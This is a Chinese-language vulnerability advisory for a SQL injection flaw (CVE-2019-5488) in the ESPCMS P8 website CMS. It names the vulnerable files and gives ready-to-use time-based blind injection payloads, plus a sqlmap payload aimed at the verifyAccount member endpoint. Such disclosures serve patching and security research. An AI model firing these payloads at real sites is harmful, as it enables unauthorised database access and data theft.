CVE中文申请站

一、漏洞摘要

漏洞名称: ESPCMS企业网站管理系统P8存在SQL注入漏洞
上报日期: 2019-01-04
漏洞发现者: Sins
产品首页: https://www.earclink.com/html/cn/espcms/
软件链接: https://www.earclink.com/html/cn/download_espcms/
版本: P8
CVE编号: CVE-2019-5488


二、漏洞概述

由于SQL语句的拼接不当,导致存在SQL注入,具体请看漏洞代码
/install_pack/espcms_public/espcms_db.php
205-363
1.png
跟踪代码,发现仅在输出处使用了addslashes函数进行转义,具体代码如下:
/install_pack/espcms_web/Member.php
437-439
2.png

三、利用代码

时间盲注,判定漏洞存在后,可以使用sqlmap进行注入。
Exp:

1.(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
2.(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/

以下是sqlmap:

payload:ac=Member&at=verifyAccount&verifyType=0&verify_key=(SELECT (CASE WHEN (9456=9456) THEN 9456 ELSE 9456*(SELECT 9456 FROM INFORMATION_SCHEMA.PLUGINS) END))

3.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/108/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5488
exploit-db:发布中

标签: SQL注入, ESPCMS